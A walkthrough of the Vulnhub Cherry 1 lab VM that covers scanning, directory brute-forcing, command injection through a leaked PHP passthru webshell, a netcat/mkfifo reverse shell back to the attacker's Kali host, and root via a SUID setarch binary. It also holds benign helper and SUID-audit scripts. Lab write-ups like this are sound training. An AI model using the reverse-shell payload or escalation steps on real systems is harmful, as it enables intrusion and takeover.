In this article we will go through the Cherry 1 VM from Vulnhub, an easy virtual machine for practising with security tools and improving your skills. You can download the OVA file here.
Our lab consists of a Kali Linux machine and Cherry 1, both on a NAT network with CIDR 10.10.10.0/24.
Kali Linux has IP 10.10.10.4
Cherry 1 has IP 10.10.10.8 (Ubuntu 20.04.1)
As we were using VirtualBox we ran into a networking problem, because Cherry 1 was built for VMware Workstation Player: its netplan configuration names the interface VMware assigns, which is not the one VirtualBox presents to the guest, so the VM never obtained an IP address. The following steps are only needed to fix this problem.
We booted the VM from a live CD and changed the netplan configuration file:
- Boot from a live CD; we used Ubuntu Desktop.
- Get the NIC's name with ip link (or ifconfig).
- Mount the VM's root volume (/dev/dm-0 is the LVM root logical volume; check lsblk if yours differs):
mount /dev/dm-0 /mnt/cherry
- Chroot into /mnt/cherry:
chroot /mnt/cherry
- Go to /etc/netplan and edit the YAML: replace the interface name with yours.
- Exit the chroot and unmount /mnt/cherry with umount.
- Restart.
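The same fix as a script, added here as an example that is not part of the original write-up. It assumes ens33 is the interface name baked into the OVA and enp0s3 is what VirtualBox presents; substitute the names you actually see. Because the script only edits files under the mount point, the chroot step can be skipped.

```shell
#!/bin/sh
# Added example, not part of the original write-up: automate the netplan fix
# from the steps above. The interface names (ens33 as the name baked into the
# OVA, enp0s3 as what VirtualBox presents) and the mount point are assumptions;
# use the names you actually see.
set -eu

# Name of the first non-loopback interface, as seen from the live CD.
first_nic() {
  ip -o link show | awk -F': ' '$2 != "lo" { print $2; exit }'
}

# Rewrite every netplan YAML under ROOT/etc/netplan so that the ethernet entry
# OLD becomes NEW. Prints each file it changed; a .bak copy is left beside it.
# Pointing ROOT at the mounted disk (/mnt/cherry) avoids the chroot entirely,
# because nothing here needs to run inside the guest.
rename_netplan_nic() {
  root="$1"; old="$2"; new="$3"
  for f in "$root"/etc/netplan/*.yaml; do
    [ -f "$f" ] || continue
    # the interface appears as a YAML key, e.g. "    ens33:"
    if grep -q "^[[:space:]]*$old:" "$f"; then
      cp "$f" "$f.bak"
      sed -i "s/^\([[:space:]]*\)$old:/\1$new:/" "$f"
      echo "$f"
    fi
  done
}

# Usage from the live CD, after mounting the guest's root volume:
#   mount /dev/dm-0 /mnt/cherry
#   rename_netplan_nic /mnt/cherry ens33 "$(first_nic)"
#   umount /mnt/cherry && reboot
```

Keeping the .bak copy means a wrong guess at the interface name can be undone from the live CD without re-editing by hand.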
Port Scanning
We started scanning our Cherry VM with nmap using this command:
nmap -p- -sV -sC 10.10.10.8 -oN first_scan.txt
-p- scans all 65535 TCP ports, -sV probes service versions and -sC runs the default script set. The output is stored in first_scan.txt in the current directory and also shown in the terminal; these results will be useful as the analysis goes on.
This is the output:
# Nmap 7.80 scan initiated Sat Jan 30 12:20:34 2021 as: nmap -p- -sV -sC -oN first_scan.txt 10.10.10.8
Nmap scan report for 10.10.10.8
Host is up (0.00012s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Cherry
7755/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Cherry
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.80%I=7%D=1/30%Time=6015956B%P=x86_64-pc-linux-gnu%r(N
SF:ULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPOp
SF:tions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVers
SF:ionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,2
SF:B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fI
SF:nvalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")
SF:%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01
SF:\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCookie
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,9
SF:,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05\
SF:x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY0
SF:00")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOptions
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\x
SF:05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,"
SF:\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x1
SF:a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000
SF:")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\0
SF:\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r
SF:(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x0
SF:8\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\
SF:x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
MAC Address: 08:00:27:7B:63:EF (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 30 12:20:58 2021 -- 1 IP address (1 host up) scanned in 24.17 seconds
As reported by nmap, ports 22, 80, 7755 and 33060 are open. Port 33060 is the MySQL X Protocol listener (the "Invalid message" / HY000 reply in the fingerprint is a MySQL error), which nmap could not fully identify; we will start with the web servers on 80 and 7755.
Going to http://10.10.10.8/ and http://10.10.10.8:7755/ the browser shows the same page, titled Cherry, on both ports.
Bruteforcing web directories
In order to discover which files and directories are reachable on these ports we will use dirbuster. Make sure you have some wordlists on your attacking machine; Kali Linux usually ships with a bunch of them. If you are not sure which wordlists you have, run:
locate wordlist
We will use /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt. Run dirbuster:
dirbuster -u http://10.10.10.8:7755 -l /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 200 -e html,htm,php,txt -v
-u the URL of the target
-l path to the wordlist
-t number of threads
-e file extensions to append to each word
-v verbose mode
This will run for 10 to 20 minutes, depending on how much CPU and RAM you gave to Kali.
These are our results:
/
/icons/
/backup/
/icons/small/
/server-status/
/index.html
/info.php
/backup/command.php
/backup/latest.tar.gz
/backup/master.zip.bak
/backup/master.zip
We will focus on command.php.
Requesting the same path on port 80 makes the browser download the file instead of running it: nginx on port 80 has no PHP handler configured, so it serves command.php as a static file and leaks its source. The source shows that the script hands the backup query parameter to PHP's passthru(), which, like exec(), runs it as a shell command and returns the output, so we can execute arbitrary commands through the Apache instance on port 7755.
command.php’s content:
<?php echo passthru($_GET['backup']); ?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Backup</title>
</head>
<body>
<!-- </?php echo passthru($_GET['backup']); ?/> -->
</body>
</html>
Exploiting payload
Since the backup parameter is passed straight to a shell, we first try the id command:
http://10.10.10.8:7755/backup/command.php?backup=id
You can also try cat /etc/passwd. Make sure to URL-encode special characters (spaces, slashes) in the command.
Prepare the Kali box with a netcat listener on a high port using the -lvnp options; we are going to catch a reverse shell.
nc -lvnp 4444
The payload we used is:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.4 4444 >/tmp/f
The final URL with the payload is:
http://10.10.10.8:7755/backup/command.php?backup=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.10.4%204444%20%3E%2Ftmp%2Ff
On our Kali machine a shell comes back, but without a TTY (no prompt handling, job control or tab completion). To upgrade it to an interactive shell we ran:
python3 -c 'import pty;pty.spawn("/bin/bash")'
This spawns bash on a pseudo-terminal inside our session.
Privilege escalation
Now we have access to Cherry 1 as the www-data user, but we want root.
We looked for an exploitable SUID binary and found setarch. The following command lists every SUID file; check each candidate against a SUID-abuse reference such as GTFOBins:
find / -perm -u=s -type f 2>/dev/null
setarch does nothing more than exec the program you name, so when it is SUID root the shell it launches inherits the root effective UID. We exploit that with:
setarch $(arch) /bin/sh -p
Now we are root (the -p flag stops the shell from dropping the inherited effective UID).
Use id command or whoami if you don’t trust us ;-)
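The defender's view of the same step, added here as an example that is not part of the original write-up: an inventory of SUID files with owner and mode, diffed against a baseline taken from a clean build. setarch is not SUID on a stock Ubuntu 20.04 install, so a planted one shows up in the diff. The baseline file path is an assumption.

```shell
#!/bin/sh
# Added example, not part of the original write-up: inventory SUID binaries
# and diff the inventory against a baseline taken from a known-good system.
# This is the defender-side counterpart of the find command above; setarch is
# not SUID on a stock Ubuntu 20.04 install, so it would show up in the diff.
# The baseline file path is an assumption.
set -eu

# SUID files under ROOT with owner, mode and path. -perm -4000 is the numeric
# form of -perm -u=s. Output is sorted so it can be fed to comm(1).
find_suid() {
  find "$1" -perm -4000 -type f -printf '%u:%g %m %p\n' 2>/dev/null | sort
}

# Lines in the current SUID inventory that are not in BASELINE. A mode or
# owner change on a known binary shows up as well as a brand-new SUID file.
suid_new_since() {
  root="$1"; baseline="$2"
  find_suid "$root" | comm -13 "$baseline" -
}

# Usage on the target:
#   find_suid / > /var/lib/suid.baseline        # once, on a clean build
#   suid_new_since / /var/lib/suid.baseline     # later: anything new is suspect
```

Recording owner and mode rather than just the path is what catches this box's trick: the binary is a legitimate util-linux file, only its permission bits changed.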
Move to the /root directory and read proof.txt.
Here is the flag:
Sun_CSR_TEAM.af6d45da1f1181347b9e2139f23c6a5b
Conclusion
This virtual machine shows how much correct web-server configuration matters: nginx served a PHP file as plain text and disclosed the source of a command-execution script that Apache on another port was happy to run, and a needlessly SUID binary turned that foothold into root. Exercises like this are a powerful way to understand how the systems on our network really behave, and give us the right perspective for deploying new systems with an appropriate security posture.
We hope you enjoyed our article, and hopefully it won't be the last.